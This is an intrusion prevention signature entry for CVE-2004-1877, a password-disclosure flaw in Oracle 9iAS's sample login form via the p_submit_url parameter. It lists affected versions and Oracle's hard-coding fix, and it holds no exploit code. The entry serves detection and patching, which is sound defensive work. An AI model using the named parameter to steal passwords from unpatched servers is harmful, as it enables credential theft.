Intrusion Prevention

Oracle.Single.Sign.On.Information.Disclosure

Description

This indicates a possible exploit of a credential disclosure vulnerability in the sample login form in Oracle 9i Application Server(9iAS) that may allow remote attackers to steal users' passwords via the parameter p_submit_url.

Affected Products

Oracle Oracle HTTP Server 9.2 .0
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 8.1.7
Oracle Oracle9i Application Server 9.0.3 .1
Oracle Oracle9i Application Server 9.0.3
Oracle Oracle9i Application Server 9.0.2 .3
Oracle Oracle9i Application Server 9.0.2 .2
Oracle Oracle9i Application Server 9.0.2 .1
Oracle Oracle9i Application Server 9.0.2 .0.1
Oracle Oracle9i Application Server 9.0.2 .0.0
Oracle Oracle9i Application Server 9.0.2
Oracle Oracle9i Application Server 1.0.2 .2.2
Oracle Oracle9i Application Server 1.0.2 .2
Oracle Oracle9i Application Server 1.0.2 .1s
Oracle Oracle9i Application Server 1.0.2

Impact

Information disclosure.

Recommended Actions

Oracle has released the following solution:
The p_submit_url value in the customized login page can be hard-coded. This will mitigate this issue since it will not be an input value to the page anymore.

CVE References

CVE-2004-1877